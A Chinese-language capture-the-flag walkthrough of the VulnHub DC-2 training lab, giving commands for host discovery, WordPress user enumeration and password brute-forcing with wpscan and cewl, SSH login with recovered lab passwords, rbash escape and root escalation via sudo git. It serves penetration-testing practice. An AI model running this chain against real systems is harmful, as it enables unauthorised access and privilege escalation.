- 环境搭建:
DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。接下来我们就从基本操作系统安装中完全重新开始。
和DC-1一样,有五个flag
下载靶场环境这里我放在下面了
https://www.vulnhub.com/entry/dc-2,311/
一、渗透靶场
目标就是我们搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24
输入代码 ifconfig查看自己的虚拟IP
在输入 nmap -sP 192.168.136.0/24 寻找靶机真实IP
搜寻探端口及服务
nmap -A -p- -v 192.168.136.130
发现开放了80端口,存在web服务 ,7744端口,开放了ssh服务
接着访问web站点
这时可以修改hosts文件,添加靶机IP到域名dc-2的指向
输入 vim /etc/hosts
先点i见进入插入模式在打好id shift+: 在输入wq退出
添加完成之后,再次访问,访问成功
可以很明显的发现这是一个wordpress的站点发现flag1在网页下面我们flag
接着做一个目录扫描 dirb http://dc-2/
打开后进入到登录页面
发现多个遍历,但似乎没什么有用的东西
用户名枚举
前面我们提到这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描
输入代码扫描wordpress版本
wpscan --url http://dc-2
发现wordpress的版本4.7.10
返回登入界面发现能进入
wpscan --url http://dc-2 --enumerate u 输入代码后
枚举出三个用户名
admin jerry tom
在输入代码查看 cewl http://dc-2/ -w dict.txt
使用wpscan进行暴力破解
wpscan --url http://dc-2 --passwords dc2.txt
爆破出来两个账号 及密码
帐号 jerry 密码 adipiscing
tom parturient
登入之前的网站 两个账号密码都可以进入(这里只进入一个)
找到flag2
登录ssh
ssh tom@192.168.66.141 -p 7744
找到flag3 发现只有less和vi可以查看
发现一个提示
接下来尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642
查看可以使用的命令
echo $PATH
cd进不去目录 使用ls直接查看目录信息
使用echo来绕过rbash输入代码
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
在jerry的家目录发现flag4
在输入cat flag4.txt 发现提示(意思就不翻译了)
flag4 提示我们可以使用git,我们可以通过git来提权
使用tom用户无权限运行sudo 我们切换到jerry用户,我们可以看到无需root权限,jerry 可以使用 git
输入sudo -l
里面的空白部分分别是tom和jeryy的密码(密码无法看到)
提权 find / -user root -perm -4000 -print 2>/dev/null
jerry用户也不可以直接sudo su
使用git命令进行提取
sudo git help status
输入!/bin/sh,直接输入就行
发现final-flag.txt
cd /root
cat final-flag.txt
到此实验结束